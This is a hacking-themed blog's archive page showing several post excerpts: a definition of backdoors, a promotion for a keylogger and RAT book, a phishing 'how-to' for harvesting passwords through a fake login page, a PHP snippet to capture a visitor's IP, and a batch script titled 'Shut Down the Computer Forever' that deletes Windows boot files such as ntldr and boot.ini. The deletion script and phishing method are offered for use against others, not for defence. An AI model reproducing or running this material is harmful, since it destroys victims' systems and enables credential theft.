Pages

Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Sunday, February 3, 2013

Backdoor

How to Detect Hidden Backdoors, Trojan Horses and Rootkit Tools ?

Learn How To Detect A Backdoor On a Tool.
In this article i'm going to show you how to detect a backdoor on a tool.

What is a BackDoor?

A backdoor in a computer system (or cryptosystem or algorithm) is a method of bypassing normal authentication, securing remote access to a computer, obtaining access to plaintext, and so on, while attempting to remain undetected, the backdoor may take the form of an installed program, or could be a modification to an existing program or hardware device. It hides in the computer, scans existing loopholes, opens corresponding ports, as well as modifies system registration files.

Saturday, February 2, 2013

Keyloggers

What are Keyloggers ?

An Introduction To Keyloggers, RATS And Malware" by Rafay Baloch is completely dedicated to newbies who are looking forward to play with keyloggers, RATs and various other forms of malware, or are curious to know how they can protect their PC's from getting infected with Trojan, worms and other forms of viruses.

Rafay Baloch

The book takes you right from the basics to some advanced types of attacks. In this book Rafay have also reviewed various types of best
 keyloggers out there so you can find it easier to choose the best one according to your needs.

Wednesday, May 2, 2012

17 ways to Hack a computer


Here I will describe all the methods which are popular in the world of hacking in order to hack into a computer terminal and online account.

1. Phishing
This is a method where you have to bring the user to a webpage created by you which appears to be the same as the interface of the legitimate one and get him/her to enter the credentials. Then the redirect page will land somewhere else and you will get the password in your mail box as defined inside the php script.

Monday, April 30, 2012

How to Find someone's IP Address

This is method to get someone IP using a PHP script. Just copy the below code and paste it in notepad. Save the file as ip.php you can change ip to any name but .php is must.

$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$img_number = imagecreate(400,95);
$backcolor = imagecolorallocate($img_number,10,102,153);
$textcolor = imagecolorallocate($img_number,255,255,255);
imagefill($img_number,0,0,$backcolor);

Sunday, April 8, 2012

Shut Down the Computer Forever



Open notepad and copy/paste this code:
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Wednesday, March 21, 2012

Hackers released their own OS

Yes! Its true,  Anonymous Hackers released their own Operating System with name "Anonymous-OS", is Live is an ubuntu-based distribution and created under Ubuntu 11.10 and uses Mate desktop.
You can create the LiveUSB with http://unetbootin.sourceforge.net/